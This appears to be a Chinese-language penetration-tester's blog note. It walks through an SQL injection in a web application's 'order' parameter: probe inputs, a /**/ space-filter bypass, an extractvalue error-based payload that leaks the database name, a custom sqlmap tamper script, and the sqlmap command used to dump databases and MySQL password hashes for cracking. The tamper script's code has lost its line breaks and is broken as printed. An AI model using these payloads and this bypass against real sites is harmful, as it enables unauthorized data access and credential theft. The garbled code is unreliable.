下面是来自今天的项目，简单记录一下

手工注入

加单引号sql报错

sql语句如下，可见参数id原本未被引号包裹

SELECT DISTINCT u.* FROM t_user u WHERE u.name like '%1%' and u.account like '%1%' and u.state = ?  order by id' desc  limit 0,20

多方尝试，使用sqlmap还是未能注入出来

在不影响测试的情况下删除请求的多于参数，手工测试如下

order=id'			 报错
order=id' and 1=1    未报错
order=id'+and+1=1    未报错，按理说多了个单引号就会引发报错，但是这里没有,说明有限制

尝试使用sql注释符/**/代替空格，引发报错，说明所输入语句成功带入了进去

order=id'/**/and/**/1=1

接下来就继续构造查询语句，尝试使用extractvalue进行报错查询，成功获取当前数据库名^ecph_ps^

order=id/**/and/**/extractvalue(1,concat('^',(select/**/database()),'^'))/**/#

那到这里就找到了绕过方式，使用/**/代替空格，编写tamper语句，继续使用sqlamp注入，replaceSpace.py如下

#!/usr/bin/env python"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""from lib.core.compat import xrange
from lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWdef dependencies():passdef tamper(payload, **kwargs):"""Replaces space character (' ') with plus ('+')Notes:* Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards* This tamper script works against all databases>>> tamper('SELECT id FROM users')'SELECT+id+FROM+users'"""retVal = payloadif payload:retVal = ""quote, doublequote, firstspace = False, False, Falsefor i in xrange(len(payload)):if not firstspace:if payload[i].isspace():firstspace = True#retVal += "+"retVal += "/**/"continueelif payload[i] == '\'':quote = not quoteelif payload[i] == '"':doublequote = not doublequoteelif payload[i] == " " and not doublequote and not quote:#retVal += "+"retVal += "/**/"continueretVal += payload[i]return retVal

sqlmap.py -r r.txt -v 3 --level 5 --tamper=D:\3-安全工具\漏洞检测与利用\web漏洞\sqlmap\tamper\replaceSpace.py --technique=E

成功注入

获取数据库

获取mysql账号hash

解密

如果开放了数据库端口就可以连接了